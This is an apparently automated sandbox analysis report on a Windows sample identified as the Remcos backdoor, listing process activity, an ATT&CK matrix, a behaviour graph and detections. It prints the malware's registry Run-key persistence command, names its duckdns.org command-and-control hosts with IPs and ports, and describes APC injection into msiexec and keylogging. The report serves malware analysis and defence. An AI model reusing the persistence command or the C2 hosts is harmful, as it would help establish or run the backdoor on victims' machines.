      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9911Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 904Thread sleep count: 284 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 904Thread sleep time: -142000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 1260Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 1260Thread sleep count: 9486 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 1260Thread sleep time: -28458000s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040580B
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000828000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.000000000082B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\x295IO8kqM.exeAPI call chain: ExitProcess graph end nodegraph_0-3522
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3BD0000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "feries" /t reg_expand_sz /d "%galliasses% -windowstyle 1 $misconceiving=(gp -path 'hkcu:\software\materialeanskaffelsernes\').applikationstilpasninger;%galliasses% ($misconceiving)"
      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "feries" /t reg_expand_sz /d "%galliasses% -windowstyle 1 $misconceiving=(gp -path 'hkcu:\software\materialeanskaffelsernes\').applikationstilpasninger;%galliasses% ($misconceiving)"Jump to behavior
      Source: msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager)sF
      Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerows
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernet/
      Source: msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerR
      Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager7sd
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager`
      Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager~
      Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerYs
      Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager\s
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managery
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5324, type: MEMORYSTR
      Source: Yara matchFile source: C:\ProgramData\aksloest.dat, type: DROPPED

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5324, type: MEMORYSTR
      Source: Yara matchFile source: C:\ProgramData\aksloest.dat, type: DROPPED
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      Registry Run Keys / Startup Folder
      1
      Access Token Manipulation
      2
      Masquerading
      11
      Input Capture
      11
      Security Software Discovery
      Remote Services11
      Input Capture
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter
      1
      DLL Side-Loading
      312
      Process Injection
      1
      Modify Registry
      LSASS Memory2
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Registry Run Keys / Startup Folder
      2
      Virtualization/Sandbox Evasion
      Security Account Manager2
      Process Discovery
      SMB/Windows Admin Shares1
      Clipboard Data
      2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading
      1
      Access Token Manipulation
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture213
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script312
      Process Injection
      LSA Secrets2
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing
      Cached Domain Credentials14
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574342 Sample: x295IO8kqM.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 30 eweo9264gtuiorta1.duckdns.org 2->30 32 eweo9264gtuiort.duckdns.org 2->32 34 3 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 52 3 other signatures 2->52 10 x295IO8kqM.exe 26 2->10         started        signatures3 50 Uses dynamic DNS services 32->50 process4 process5 12 powershell.exe 26 10->12         started        signatures6 54 Early bird code injection technique detected 12->54 56 Writes to foreign memory regions 12->56 58 Found suspicious powershell code related to unpacking or dynamic code loading 12->58 60 2 other signatures 12->60 15 msiexec.exe 5 15 12->15         started        20 conhost.exe 12->20         started        process7 dnsIp8 36 eweo9264gtuiort.duckdns.org 192.169.69.26, 2879, 2889, 49716 WOWUS United States 15->36 38 eweo9264gtuiorta1.duckdns.org 172.111.244.113, 2879, 49718 M247GB United States 15->38 40 3 other IPs or domains 15->40 28 C:\ProgramData\aksloest.dat, data 15->28 dropped 42 Installs a global keyboard hook 15->42 22 cmd.exe 1 15->22         started        file9 signatures10 process11 process12 24 conhost.exe 22->24         started        26 reg.exe 1 1 22->26         started       

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      x295IO8kqM.exe100%AviraTR/AVI.Agent.lbxod
      x295IO8kqM.exe39%ReversingLabsWin32.Backdoor.Remcos
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
      eweo9264gtuiorta1.duckdns.org0%Avira URL Cloudsafe
      eweo9264gtuiort.duckdns.org0%Avira URL Cloudsafe
      http://www.quovadis.bm00%Avira URL Cloudsafe
      https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      eweo9264gtuiorta1.duckdns.org
      172.111.244.113
      truetrue
        unknown
        eweo9264gtuiort.duckdns.org
        192.169.69.26
        truetrue
          unknown
